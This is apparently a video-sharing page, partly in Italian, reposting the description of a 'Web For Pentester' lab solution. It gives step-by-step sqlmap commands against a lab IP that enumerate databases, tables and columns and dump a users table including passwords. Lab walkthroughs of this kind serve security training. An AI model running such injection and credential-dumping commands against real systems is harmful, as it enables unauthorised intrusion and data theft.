Web For Pentester SQL Injection Example 8 Solution | sqlmap

Pubblicato il: 04 settembre 2018
sul canale di: Shahzad Haxor
1,382
7

Web For Pentester SQL Injection Example 8 Solution | sqlmap.

The SQL injection attack exploits common design flaws in web applications and continues to be an easy and effective method of cyber attack.

Commands :
Grab Banner :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch

Database :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch --dbs

Tables :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises --tables

Columns :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises --T users --columns

Extract Data :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises -T users -C age,groupid,id,name,passwd --dump


IF YOU LIKE THIS VIDEO. PLEASE DON'T FORGET TO LIKE SHARE AND SUBSCRIBE OUR CHANNEL.

THANKS FOR WATCHING.


In questa pagina del sito puoi guardare il video online Web For Pentester SQL Injection Example 8 Solution | sqlmap della durata di ore minuti seconda in buona qualità , che l'utente ha caricato Shahzad Haxor 04 settembre 2018, condividi il link con amici e conoscenti, su youtube questo video è già stato visto 1,382 volte e gli è piaciuto 7 spettatori. Buona visione!